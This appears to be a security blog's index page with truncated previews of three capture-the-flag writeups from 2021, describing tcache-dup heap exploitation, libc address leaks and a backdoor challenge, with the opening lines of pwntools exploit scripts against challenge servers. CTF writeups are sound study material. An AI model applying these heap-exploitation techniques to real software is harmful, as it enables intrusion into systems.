YYsecurity
[UDCTF 2021 | BlueHens 2021] Partial Writeup
Encrheapt just malloc and free tcache dup. it's freaking easy. just do it from pwn import * #context.log_level = 'debug' #p = process("./a.out") p = remote("challenges.ctfd.io", 30028) def encrypt(ch, size, con): p.sendlineafter('3. Exit\n', '1') p.sendlineafter('2)??: ', str(ch)) p.sendlineafter(' key?:', '1') p.sendlineafter('How much would you like to encrypt: ', str(size)) p.sendlineafter('W..
![[UTCTF 2021] Partial Writeup](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdpMR2n%2Fbtq0Tu1GtFh%2FZidk4zT5LrHlAe8G09coRk%2Fimg.png)
[UTCTF 2021] Partial Writeup
Monke so we should set can_eat to 0 to use tcache dup. when we type a char except 'w', 'e', 's', 'n', we can set can_eat to 0. and we can leak to free unsorted bin and read the name of banana (which has been freed). so I know libc_addr and we can AAW by tcache dup let's play~ from pwn import * p = remote("pwn.utctf.live", 9999) elf = ELF("./monke") libc = ELF("./libc-2.27.so") def walk(d): p.sen..
![[zer0pts CTF 2021] Partial Writeup](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FQz5uV%2FbtqZywyxU3X%2FqroABUZsH20mEK3UiU8r00%2Fimg.png)
[zer0pts CTF 2021] Partial Writeup
Infected The goal of this problem is to access /root directory. Upon extraction, the backdoor file and the pow.py file are located. First, let's analyze pow.py. """ i.e. sha256("????v0iRhxH4SlrgoUd5Blu0") = b788094e2d021fa16f30c83346f3c80de5afab0840750a49a9254c2a73ed274c Suffix: v0iRhxH4SlrgoUd5Blu0 Hash: b788094e2d021fa16f30c83346f3c80de5afab0840750a49a9254c2a73ed274c """ import itertools impor..